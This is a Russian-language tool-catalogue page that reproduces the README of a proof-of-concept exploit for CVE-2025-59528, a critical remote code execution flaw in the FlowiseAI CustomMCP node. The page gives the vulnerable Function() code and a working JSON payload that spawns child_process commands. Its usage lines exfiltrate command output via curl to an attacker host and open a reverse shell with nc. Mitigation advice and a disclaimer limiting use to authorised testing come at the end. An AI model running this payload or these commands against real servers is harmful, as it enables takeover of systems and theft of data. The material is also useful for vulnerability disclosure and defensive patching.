Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-59528-POC — CVE-2025-59528 - удалённое выполнение кода в FlowiseAI CustomMCP | Kitploit
Инструменты/GitHubGitHub/usifaraby/cve-2025-59528-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubusifaraby/cve-2025-59528-poc

CVE-2025-59528-POC

CVE-2025-59528 - удалённое выполнение кода в FlowiseAI CustomMCP

Репозиторий
114 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-59528 - Удаленное выполнение кода в FlowiseAI CustomMCP

CVSS 10.0 (Критический) | Слепое RCE | FlowiseAI Flowise >= 2.2.7-patch.1 и < 3.0.6

Обзор

Критическая уязвимость удаленного выполнения кода в узле CustomMCP проекта FlowiseAI Flowise. Функция convertToValidJSONString передает пользовательский ввод из параметра mcpServerConfig напрямую в конструктор JavaScript Function(), функционально эквивалентный eval(), что позволяет выполнять произвольный JavaScript-код с полными привилегиями среды выполнения Node.js.

  • Обнаружил: Kim SooHyun (@im-soohyun)
  • Уведомление: GHSA-3gcm-f6qx-ff7p
  • Исправлено в: Flowise v3.0.6 (заменено на )
Function()
JSON5.parse()

Уязвимый код

В файле packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts, строки 262–270:

root@kitploit:~
function convertToValidJSONString(inputString) {
    return Function('return ' + inputString)();  // ← arbitrary code execution
}

Путь распространения (taint flow):

root@kitploit:~
HTTP POST → /api/v1/node-load-method/customMCP
  → controller.getSingleNodeAsyncOptions()
    → service layer
      → CustomMCP.listActions()
        → convertToValidJSONString(mcpServerConfig)  // Function('return ' + userInput)()

Эксплуатация

Это слепое RCE — вывод команды не отражается в HTTP-ответе. Используйте техники обратного вызова (curl/wget) или обратную оболочку (reverse shell) для подтверждения выполнения.

Требования

УсловиеДетали
Версия Flowise>= 2.2.7-patch.1, < 3.0.6
Сетевой доступAPI-эндпоинт на порту 3000 (по умолчанию)
АутентификацияНеобязательна для < 3.0.1, обязательна для >= 3.0.1

Полезная нагрузка

root@kitploit:~
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
  }
}

Использование

root@kitploit:~
pip install requests

Проверка, уязвима ли цель (time-based)

root@kitploit:~
python3 exploit.py -t http://target:3000 --mode check --email [email protected] --password pass

Слепое выполнение команд

root@kitploit:~
# Exfiltrate output via callback
python3 exploit.py -t http://target:3000 --mode exec \
  -c "curl http://ATTACKER:PORT/\$(id | base64)" \
  --email [email protected] --password pass

Обратная оболочка

root@kitploit:~
# Start listener
nc -lvnp 4444

# Fire exploit (auto-tries bash, nc, python)
python3 exploit.py -t http://target:3000 --mode revshell \
  --lhost ATTACKER_IP --lport 4444 \
  --email [email protected] --password pass

Параметры аутентификации

root@kitploit:~
# JWT auth (Flowise >= 3.0.1)
--email [email protected] --password pass

# Basic auth (Flowise < 3.0.1 with FLOWISE_USERNAME env)
--username admin --password pass

# Raw cookie string (fallback)
--cookie "token=eyJ...;refreshToken=eyJ...;connect.sid=s%3A..."

Устранение

  • Обновитесь до Flowise >= 3.0.6
  • Ограничьте доступ к API через брандмауэр/VPN
  • Включите аутентификацию на всех экземплярах
  • Отслеживайте логи на предмет POST-запросов к /api/v1/node-load-method/customMCP

Ссылки

  • NVD — CVE-2025-59528
  • Уведомление GitHub — GHSA-3gcm-f6qx-ff7p
  • Анализ угроз SonicWall
  • Коммит с исправлением — Flowise v3.0.6

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным. Всегда получайте надлежащее разрешение перед тестированием.

Скачать инструмент